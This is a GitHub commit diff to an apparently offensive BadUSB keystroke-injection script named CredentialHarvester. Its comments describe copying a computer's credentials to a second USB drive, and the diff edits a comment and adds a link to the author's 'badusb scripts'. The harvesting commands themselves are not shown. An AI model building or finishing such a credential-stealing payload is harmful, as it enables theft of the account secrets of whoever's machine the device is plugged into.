Update CredentialHarvester.txt

This commit is contained in:
Mark 2024-05-21 16:26:17 -04:00 committed by GitHub
parent 5f95a6d349
commit 9109f85a8e
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -3,7 +3,7 @@ REM ############## This script was created by github.com/markcyb
REM ############## This script requires a secondary USB named "MYUSB" to save credentials to ############## REM ############## This script requires a secondary USB named "MYUSB" to save credentials to ##############
REM ############## The extracted data will require decryption ############## REM ############## The extracted data will require decryption ##############
REM ################################################################################################################## REM ##################################################################################################################
REM Open PowerShell with elevated privileges REM Open PowerShell
DELAY 1000 DELAY 1000
GUI r GUI r
DELAY 500 DELAY 500
@ -51,3 +51,4 @@ REM Close PowerShell
STRING exit STRING exit
ENTER ENTER
DELAY 500 DELAY 500
REM Check out Github.com/MarkCyber for more badusb scripts and other hacky stuff